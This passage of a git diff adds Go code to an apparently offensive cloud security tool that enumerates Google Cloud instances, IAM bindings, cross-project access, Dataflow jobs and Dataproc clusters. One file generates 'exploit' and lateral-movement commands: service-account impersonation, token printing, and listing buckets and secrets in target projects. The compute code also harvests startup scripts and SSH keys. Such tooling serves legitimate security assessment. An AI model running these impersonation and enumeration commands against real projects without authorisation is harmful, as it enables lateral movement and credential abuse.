info.HasDefaultSA, info.HasCloudScopes = parseServiceAccounts(instance.ServiceAccounts, projectID) + + // Parse shielded VM config + if instance.ShieldedInstanceConfig != nil { + info.ShieldedVM = true + info.SecureBoot = instance.ShieldedInstanceConfig.EnableSecureBoot + info.VTPMEnabled = instance.ShieldedInstanceConfig.EnableVtpm + info.IntegrityMonitoring = instance.ShieldedInstanceConfig.EnableIntegrityMonitoring } + + // Parse confidential VM config + if instance.ConfidentialInstanceConfig != nil { + info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute + } + + // Parse metadata for security-relevant items including content + if instance.Metadata != nil { + metaResult := parseMetadataFull(instance.Metadata) + info.HasStartupScript = metaResult.HasStartupScript + info.HasSSHKeys = metaResult.HasSSHKeys + info.BlockProjectSSHKeys = metaResult.BlockProjectSSHKeys + info.OSLoginEnabled = metaResult.OSLoginEnabled + info.OSLogin2FAEnabled = metaResult.OSLogin2FA + info.SerialPortEnabled = metaResult.SerialPortEnabled + info.StartupScriptContent = metaResult.StartupScriptContent + info.StartupScriptURL = metaResult.StartupScriptURL + info.SSHKeys = metaResult.SSHKeys + info.CustomMetadata = metaResult.CustomMetadata + } + + // Parse boot disk encryption + info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + + // Fetch IAM bindings for this instance + info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) + instanceInfos = append(instanceInfos, info) } } @@ -96,4 +263,326 @@ func getInternalIP(instance *compute.Instance) string { return "" } -// TODO consider just getting the emails of the service account and returning a []string +// getMachineTypeName extracts the machine type name from a full URL +func getMachineTypeName(machineTypeURL string) string { + parts := strings.Split(machineTypeURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return 
machineTypeURL +} + +// parseServiceAccounts extracts service account info and checks for security concerns +func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]ServiceAccountInfo, bool, bool) { + var accounts []ServiceAccountInfo + hasDefaultSA := false + hasCloudScopes := false + + defaultSAPattern := fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectID) + + for _, sa := range sas { + info := ServiceAccountInfo{ + Email: sa.Email, + Scopes: sa.Scopes, + } + accounts = append(accounts, info) + + // Check if using default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") || + strings.HasSuffix(sa.Email, defaultSAPattern) { + hasDefaultSA = true + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" || + scope == "https://www.googleapis.com/auth/compute" || + scope == "https://www.googleapis.com/auth/devstorage.full_control" || + scope == "https://www.googleapis.com/auth/devstorage.read_write" { + hasCloudScopes = true + } + } + } + + return accounts, hasDefaultSA, hasCloudScopes +} + +// MetadataParseResult contains all parsed metadata fields +type MetadataParseResult struct { + HasStartupScript bool + HasSSHKeys bool + BlockProjectSSHKeys bool + OSLoginEnabled bool + OSLogin2FA bool + SerialPortEnabled bool + StartupScriptContent string + StartupScriptURL string + SSHKeys []string + CustomMetadata []string +} + +// parseMetadata checks instance metadata for security-relevant settings +func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) { + result := parseMetadataFull(metadata) + return result.HasStartupScript, result.HasSSHKeys, result.BlockProjectSSHKeys, + result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled +} + +// parseMetadataFull extracts all metadata including content +func 
parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { + result := MetadataParseResult{} + if metadata == nil || metadata.Items == nil { + return result + } + + // Known metadata keys to exclude from custom metadata + knownKeys := map[string]bool{ + "startup-script": true, + "startup-script-url": true, + "ssh-keys": true, + "sshKeys": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + } + + for _, item := range metadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "startup-script": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptContent = *item.Value + } + case "startup-script-url": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptURL = *item.Value + } + case "ssh-keys", "sshKeys": + result.HasSSHKeys = true + if item.Value != nil { + // Parse SSH keys - format is "user:ssh-rsa KEY comment" + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + result.SSHKeys = append(result.SSHKeys, line) + } + } + } + case "block-project-ssh-keys": + if item.Value != nil && *item.Value == "true" { + result.BlockProjectSSHKeys = true + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + result.OSLogin2FA = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + result.SerialPortEnabled = true + } + default: + // Track custom metadata keys (may contain secrets) + if !knownKeys[item.Key] { + result.CustomMetadata = append(result.CustomMetadata, item.Key) + } + } + } + + return result +} + +// parseBootDiskEncryption checks the boot disk encryption type 
+func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { + encryptionType = "Google-managed" + + for _, disk := range disks { + if disk == nil || !disk.Boot { + continue + } + + if disk.DiskEncryptionKey != nil { + if disk.DiskEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKey = disk.DiskEncryptionKey.KmsKeyName + } else if disk.DiskEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + break // Only check boot disk + } + + return +} + +// FormatScopes formats service account scopes for display +func FormatScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + // Shorten scope URLs for display + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} + +// GetProjectMetadata retrieves project-level compute metadata +func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectMetadataInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &ProjectMetadataInfo{ + ProjectID: projectID, + } + + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "ssh-keys", "sshKeys": + info.HasProjectSSHKeys = true + if item.Value != nil { + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + info.ProjectSSHKeys = append(info.ProjectSSHKeys, line) + } + } + } + case "startup-script": + info.HasProjectStartupScript = true + if item.Value != nil { + 
info.ProjectStartupScript = *item.Value + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLogin2FAEnabled = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + info.SerialPortEnabled = true + } + default: + // Track other custom metadata that might contain secrets + if !isKnownMetadataKey(item.Key) { + info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) + } + } + } + } + + return info, nil +} + +// isKnownMetadataKey checks if a metadata key is a known system key +func isKnownMetadataKey(key string) bool { + knownKeys := map[string]bool{ + "ssh-keys": true, + "sshKeys": true, + "startup-script": true, + "startup-script-url": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + "google-compute-enable-logging": true, + "google-compute-enable-ssh-agent": true, + } + return knownKeys[key] +} + +// GetInstanceIAMPolicy retrieves IAM policy for a specific instance +func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceName string) (*InstanceIAMInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &InstanceIAMInfo{ + InstanceName: instanceName, + Zone: zone, + ProjectID: projectID, + } + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + switch binding.Role { + case "roles/compute.admin", "roles/owner": + info.ComputeAdmins = append(info.ComputeAdmins, 
binding.Members...) + case "roles/compute.instanceAdmin", "roles/compute.instanceAdmin.v1": + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + case "roles/compute.osLogin", "roles/compute.osAdminLogin": + info.SSHUsers = append(info.SSHUsers, binding.Members...) + } + + // Check for specific permissions via custom roles (more complex detection) + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + // Custom role - would need to check permissions, but we note the binding + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + } + } + + return info, nil +} + +// InstancesWithMetadata retrieves instances with full metadata content +func (ces *ComputeEngineService) InstancesWithMetadata(projectID string) ([]ComputeEngineInfo, *ProjectMetadataInfo, error) { + instances, err := ces.Instances(projectID) + if err != nil { + return nil, nil, err + } + + projectMeta, err := ces.GetProjectMetadata(projectID) + if err != nil { + // Don't fail if we can't get project metadata + projectMeta = &ProjectMetadataInfo{ProjectID: projectID} + } + + return instances, projectMeta, nil +} diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go new file mode 100644 index 00000000..104322ad --- /dev/null +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -0,0 +1,424 @@ +package crossprojectservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" +) + +type CrossProjectService struct{} + +func New() *CrossProjectService { + return &CrossProjectService{} +} + +// CrossProjectBinding represents a cross-project IAM binding +type CrossProjectBinding struct { + SourceProject string `json:"sourceProject"` // Where the principal is from + TargetProject string 
`json:"targetProject"` // Where access is granted + Principal string `json:"principal"` // The service account or user + PrincipalType string `json:"principalType"` // serviceAccount, user, group + Role string `json:"role"` // The IAM role granted + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` // Why it's risky + ExploitCommands []string `json:"exploitCommands"` // Commands for exploitation +} + +// CrossProjectServiceAccount represents a service account that may have cross-project access +type CrossProjectServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + UniqueID string `json:"uniqueId"` + TargetAccess []string `json:"targetAccess"` // Other projects this SA can access +} + +// LateralMovementPath represents a potential lateral movement path +type LateralMovementPath struct { + SourceProject string `json:"sourceProject"` + SourcePrincipal string `json:"sourcePrincipal"` + TargetProject string `json:"targetProject"` + AccessMethod string `json:"accessMethod"` // e.g., "impersonation", "direct role" + TargetRoles []string `json:"targetRoles"` + PrivilegeLevel string `json:"privilegeLevel"` // ADMIN, WRITE, READ + ExploitCommands []string `json:"exploitCommands"` +} + +// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects +func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectBindings []CrossProjectBinding + + // Build a map of project IDs for quick lookup + projectMap := make(map[string]bool) + for _, pid := range projectIDs { + projectMap[pid] = true + } + + // Analyze IAM policy of each project + for _, 
targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue // Skip projects we can't access + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sourceProject := extractProjectFromMember(member) + + // Check if this is cross-project access + if sourceProject != "" && sourceProject != targetProject { + // Check if source project is in our analysis scope + isFromKnownProject := projectMap[sourceProject] + + cpBinding := CrossProjectBinding{ + SourceProject: sourceProject, + TargetProject: targetProject, + Principal: member, + PrincipalType: extractPrincipalType(member), + Role: binding.Role, + RiskReasons: []string{}, + } + + // Analyze risk level + cpBinding.RiskLevel, cpBinding.RiskReasons = s.analyzeBindingRisk(binding.Role, member, isFromKnownProject) + cpBinding.ExploitCommands = s.generateExploitCommands(cpBinding) + + crossProjectBindings = append(crossProjectBindings, cpBinding) + } + } + } + } + + return crossProjectBindings, nil +} + +// GetCrossProjectServiceAccounts finds service accounts with cross-project access +func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectSAs []CrossProjectServiceAccount + + // Build a map of all service accounts by email -> project + saProjectMap := make(map[string]string) + allSAs := make(map[string]*CrossProjectServiceAccount) + + // List all service accounts in each project + for _, projectID := range projectIDs { + req := 
iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)) + err := req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saProjectMap[sa.Email] = projectID + allSAs[sa.Email] = &CrossProjectServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + DisplayName: sa.DisplayName, + UniqueID: sa.UniqueId, + TargetAccess: []string{}, + } + } + return nil + }) + if err != nil { + continue // Skip on error + } + } + + // Now check each project's IAM policy for service accounts from other projects + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + sourceProject := saProjectMap[email] + + // Cross-project access + if sourceProject != "" && sourceProject != targetProject { + if sa, exists := allSAs[email]; exists { + accessDesc := fmt.Sprintf("%s: %s", targetProject, binding.Role) + sa.TargetAccess = append(sa.TargetAccess, accessDesc) + } + } + } + } + } + } + + // Collect SAs with cross-project access + for _, sa := range allSAs { + if len(sa.TargetAccess) > 0 { + crossProjectSAs = append(crossProjectSAs, *sa) + } + } + + return crossProjectSAs, nil +} + +// FindLateralMovementPaths identifies lateral movement paths between projects +func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]LateralMovementPath, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var paths []LateralMovementPath + + // Analyze each project pair + for _, sourceProject := range projectIDs { + for 
_, targetProject := range projectIDs { + if sourceProject == targetProject { + continue + } + + // Get target project IAM policy + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + // Find principals from source project that have access to target + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + memberProject := extractProjectFromMember(member) + if memberProject == sourceProject { + path := LateralMovementPath{ + SourceProject: sourceProject, + SourcePrincipal: member, + TargetProject: targetProject, + AccessMethod: "Direct IAM Role", + TargetRoles: []string{binding.Role}, + PrivilegeLevel: categorizePrivilegeLevel(binding.Role), + } + path.ExploitCommands = s.generateLateralMovementCommands(path) + paths = append(paths, path) + } + } + } + } + } + + return paths, nil +} + +// analyzeBindingRisk determines the risk level of a cross-project binding +func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnownProject bool) (string, []string) { + var reasons []string + score := 0 + + // High-privilege roles + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.securityAdmin": true, + "roles/compute.admin": true, + "roles/storage.admin": true, + "roles/secretmanager.admin": true, + } + + if highPrivRoles[role] { + reasons = append(reasons, fmt.Sprintf("High-privilege role: %s", role)) + score += 3 + } + + // Admin/editor roles are always concerning + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + reasons = append(reasons, "Role contains 'admin' permissions") + score += 2 + } + + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + reasons = append(reasons, "Role contains 'editor' permissions") + score += 2 + } + + // 
Service account cross-project is higher risk than user + if strings.HasPrefix(member, "serviceAccount:") { + reasons = append(reasons, "Service account has cross-project access (can be automated)") + score += 1 + } + + // Unknown source project is concerning + if !isFromKnownProject { + reasons = append(reasons, "Access from project outside analyzed scope") + score += 1 + } + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// generateExploitCommands generates exploitation commands for a cross-project binding +func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string { + var commands []string + + if binding.PrincipalType == "serviceAccount" { + email := strings.TrimPrefix(binding.Principal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Impersonate SA from %s to access %s:", binding.SourceProject, binding.TargetProject), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# Then use token to access target project:"), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", binding.TargetProject, email), + ) + } + + // Role-specific exploitation + if strings.Contains(binding.Role, "storage") { + commands = append(commands, + fmt.Sprintf("# List buckets in target project:"), + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "compute") { + commands = append(commands, + fmt.Sprintf("# List instances in target project:"), + fmt.Sprintf("gcloud compute instances list --project=%s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "secretmanager") { + commands = append(commands, + fmt.Sprintf("# List secrets in target project:"), + fmt.Sprintf("gcloud secrets list --project=%s", 
binding.TargetProject), + ) + } + + return commands +} + +// generateLateralMovementCommands generates commands for lateral movement +func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string { + var commands []string + + if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") { + email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Lateral movement from %s to %s via SA impersonation:", path.SourceProject, path.TargetProject), + fmt.Sprintf("# 1. Get access token for the cross-project SA:"), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# 2. Use the SA to access target project:"), + ) + + // Add role-specific commands + for _, role := range path.TargetRoles { + if strings.Contains(role, "owner") || strings.Contains(role, "editor") { + commands = append(commands, + fmt.Sprintf("# Full project access with %s:", role), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", path.TargetProject, email), + ) + } + } + } + + return commands +} + +// extractProjectFromMember extracts the project ID from a member string +func extractProjectFromMember(member string) string { + // serviceAccount:sa-name@project-id.iam.gserviceaccount.com + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + // Format: name@project-id.iam.gserviceaccount.com + // or: project-id@project-id.iam.gserviceaccount.com + if strings.Contains(email, ".iam.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + } + // App Engine default service accounts + if strings.Contains(email, "@appspot.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + return strings.TrimSuffix(parts[1], 
// extractPrincipalType returns the IAM member kind encoded in the member's
// prefix (serviceAccount, user, group, domain), or "unknown" when the
// member carries no recognized prefix (e.g. allUsers).
func extractPrincipalType(member string) string {
	for _, kind := range []string{"serviceAccount", "user", "group", "domain"} {
		if strings.HasPrefix(member, kind+":") {
			return kind
		}
	}
	return "unknown"
}

// categorizePrivilegeLevel maps a role name onto a coarse privilege tier:
// ADMIN for owner/admin roles, WRITE for editor/writer/creator roles, and
// READ for everything else (viewer/reader roles and unknown roles alike).
func categorizePrivilegeLevel(role string) string {
	containsAny := func(words ...string) bool {
		for _, w := range words {
			if strings.Contains(role, w) {
				return true
			}
		}
		return false
	}

	switch {
	case containsAny("owner", "Owner", "admin", "Admin"):
		return "ADMIN"
	case containsAny("editor", "Editor", "writer", "Writer", "creator", "Creator"):
		return "WRITE"
	default:
		// Viewer/reader roles and anything unrecognized default to READ.
		return "READ"
	}
}
+) + +type DataflowService struct { + session *gcpinternal.SafeSession +} + +func New() *DataflowService { + return &DataflowService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { + return &DataflowService{session: session} +} + +// JobInfo represents a Dataflow job +type JobInfo struct { + ID string `json:"id"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // JOB_TYPE_BATCH or JOB_TYPE_STREAMING + State string `json:"state"` // JOB_STATE_RUNNING, etc. + CreateTime string `json:"createTime"` + CurrentStateTime string `json:"currentStateTime"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + TempLocation string `json:"tempLocation"` // GCS temp location + StagingLocation string `json:"stagingLocation"` // GCS staging location + WorkerRegion string `json:"workerRegion"` + WorkerZone string `json:"workerZone"` + NumWorkers int64 `json:"numWorkers"` + MachineType string `json:"machineType"` + UsePublicIPs bool `json:"usePublicIps"` + EnableStreamingEngine bool `json:"enableStreamingEngine"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TemplateInfo represents a Dataflow template +type TemplateInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + // Template metadata +} + +// ListJobs retrieves all Dataflow jobs in a project +func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataflow.Service + var err error + + if s.session != nil { + service, err = dataflow.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataflow.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + var jobs []JobInfo + + 
// List jobs across all locations + req := service.Projects.Jobs.Aggregated(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + info := s.parseJob(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + return jobs, nil +} + +// parseJob converts a Dataflow job to JobInfo +func (s *DataflowService) parseJob(job *dataflow.Job, projectID string) JobInfo { + info := JobInfo{ + ID: job.Id, + Name: job.Name, + ProjectID: projectID, + Location: job.Location, + Type: job.Type, + State: job.CurrentState, + CreateTime: job.CreateTime, + CurrentStateTime: job.CurrentStateTime, + RiskReasons: []string{}, + } + + // Parse environment settings + if job.Environment != nil { + info.ServiceAccount = job.Environment.ServiceAccountEmail + info.TempLocation = job.Environment.TempStoragePrefix + info.WorkerRegion = job.Environment.WorkerRegion + info.WorkerZone = job.Environment.WorkerZone + + // Check worker pools for network config + if len(job.Environment.WorkerPools) > 0 { + wp := job.Environment.WorkerPools[0] + info.Network = wp.Network + info.Subnetwork = wp.Subnetwork + info.NumWorkers = wp.NumWorkers + info.MachineType = wp.MachineType + + // Check for public IPs - default is true if not specified + if wp.IpConfiguration == "WORKER_IP_PRIVATE" { + info.UsePublicIPs = false + } else { + info.UsePublicIPs = true + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeJobRisk(info) + + return info +} + +// analyzeJobRisk determines the risk level of a Dataflow job +func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs increase exposure + if job.UsePublicIPs { + reasons = append(reasons, "Workers use public IP addresses") + score += 2 + } + + // Default service account is often over-privileged + if 
job.ServiceAccount == "" || strings.Contains(job.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Check for external temp/staging locations + if job.TempLocation != "" && !strings.Contains(job.TempLocation, projectID(job.ProjectID)) { + reasons = append(reasons, "Temp location may be in external project") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func projectID(id string) string { + return id +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go new file mode 100644 index 00000000..13005b0a --- /dev/null +++ b/gcp/services/dataprocService/dataprocService.go @@ -0,0 +1,303 @@ +package dataprocservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dataproc "google.golang.org/api/dataproc/v1" +) + +type DataprocService struct { + session *gcpinternal.SafeSession +} + +func New() *DataprocService { + return &DataprocService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { + return &DataprocService{session: session} +} + +// ClusterInfo represents a Dataproc cluster +type ClusterInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + State string `json:"state"` + StateStartTime string `json:"stateStartTime"` + ClusterUUID string `json:"clusterUuid"` + + // Config + ConfigBucket string `json:"configBucket"` + TempBucket string `json:"tempBucket"` + ImageVersion string `json:"imageVersion"` + ServiceAccount string `json:"serviceAccount"` + + // 
Master config + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterInstanceNames []string `json:"masterInstanceNames"` + + // Worker config + WorkerMachineType string `json:"workerMachineType"` + WorkerCount int64 `json:"workerCount"` + WorkerDiskSizeGB int64 `json:"workerDiskSizeGb"` + + // Network config + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + InternalIPOnly bool `json:"internalIpOnly"` + Zone string `json:"zone"` + + // Security config + KerberosEnabled bool `json:"kerberosEnabled"` + SecureBoot bool `json:"secureBoot"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// JobInfo represents a Dataproc job +type JobInfo struct { + JobID string `json:"jobId"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ClusterName string `json:"clusterName"` + Status string `json:"status"` + JobType string `json:"jobType"` + SubmittedBy string `json:"submittedBy"` + StartTime string `json:"startTime"` + EndTime string `json:"endTime"` +} + +// Common GCP regions for Dataproc +var dataprocRegions = []string{ + "us-central1", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4", + "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", + "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", + "asia-south1", "asia-southeast1", "asia-southeast2", + "australia-southeast1", "southamerica-east1", "northamerica-northeast1", +} + +// ListClusters retrieves all Dataproc clusters +func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = 
dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var clusters []ClusterInfo + + // List across common regions + for _, region := range dataprocRegions { + regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() + if err != nil { + continue // Skip regions with errors (API not enabled, no permissions, etc.) + } + + for _, cluster := range regionClusters.Clusters { + info := s.parseCluster(cluster, projectID, region, service, ctx) + clusters = append(clusters, info) + } + } + + return clusters, nil +} + +// ListJobs retrieves recent Dataproc jobs +func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var jobs []JobInfo + + resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + for _, job := range resp.Jobs { + info := s.parseJob(job, projectID, region) + jobs = append(jobs, info) + } + + return jobs, nil +} + +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string, service *dataproc.Service, ctx context.Context) ClusterInfo { + info := ClusterInfo{ + Name: cluster.ClusterName, + ProjectID: projectID, + Region: region, + ClusterUUID: cluster.ClusterUuid, + IAMBindings: []IAMBinding{}, + } + + if cluster.Status != nil { + info.State = cluster.Status.State + info.StateStartTime = cluster.Status.StateStartTime + } + + if cluster.Config != nil { + 
